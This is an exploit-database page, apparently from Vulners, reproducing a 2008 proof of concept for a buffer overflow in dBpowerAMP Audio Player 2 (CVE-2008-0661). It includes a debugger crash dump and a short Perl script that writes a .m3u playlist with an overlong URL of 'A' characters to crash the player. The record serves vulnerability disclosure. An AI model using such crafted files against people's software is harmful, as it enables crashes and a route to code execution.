Lucene search
+L

dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)

🗓️ 05 Feb 2008 00:00:00Reported by securfrogType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

dBpowerAMP Audio Player buffer overflow '.m3u' fil

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-0661
8 Feb 200801:00
cve
Cvelist
CVE-2008-0661
8 Feb 200801:00
cvelist
Exploit DB
dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow
6 Feb 200800:00
exploitdb
NVD
CVE-2008-0661
8 Feb 200802:00
nvd
Packet Storm
dBpowerAMP Audio Player Buffer Overflow
1 Sep 201000:00
packetstorm
Prion
Buffer overflow
8 Feb 200802:00
prion
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow

# 0:002> r
# eax=00000000 ebx=77c17a50 ecx=00000000 edx=00000107 esi=00000000 edi=00b8f217
# eip=00004141 esp=00b8ede0 ebp=77c0f931 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# 00004141 ?? ???

# EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
# ExceptionAddress: 00004141
# ExceptionCode: c0000005 (Access violation)
# ExceptionFlags: 00000000
# NumberParameters: 2
# Parameter[0]: 00000000
# Parameter[1]: 00004141
# Attempt to read from address 00004141
#
# PoC :
#
my $file="bob_marley_I_Shot_The_Sheriff.m3u";

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE "http://"."A" x 255;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";

# milw0rm.com [2008-02-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.04789
34